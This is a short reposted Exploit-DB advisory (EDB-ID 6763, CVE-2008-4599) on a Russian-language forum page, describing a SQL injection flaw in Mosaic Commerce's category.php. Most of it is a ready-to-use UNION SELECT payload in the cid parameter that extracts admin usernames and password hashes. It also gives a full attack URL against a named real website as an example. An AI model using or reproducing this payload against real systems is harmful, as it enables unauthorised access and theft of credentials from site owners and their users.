- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6763
- Проверка EDB
-
- Пройдено
- Автор
- ALI ABBASI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4599
- Дата публикации
- 2008-10-16
Код:
Mosaic Commerce SQL Injection Vulnerability
Discovered By Ali Abbasi[abbasi[At]ustmb.ac.ir]
Mazandaran University Of Science And Technology
Network Security Research Center
Babol, Iran
http://cyber-defence.com
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
{SQL BUG}
/mosaic-path/category.php?cid=[SQL]
Exploit For Get Admin Username And Password Hash:
category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
Example:
http://www.coppermax.com/category.php?cid=-12/**/union/**/select/**/1,concat(users_name,0x3a,users_password),3/**/from/**/users/*
# milw0rm.com [2008-10-16]- Источник
- www.exploit-db.com
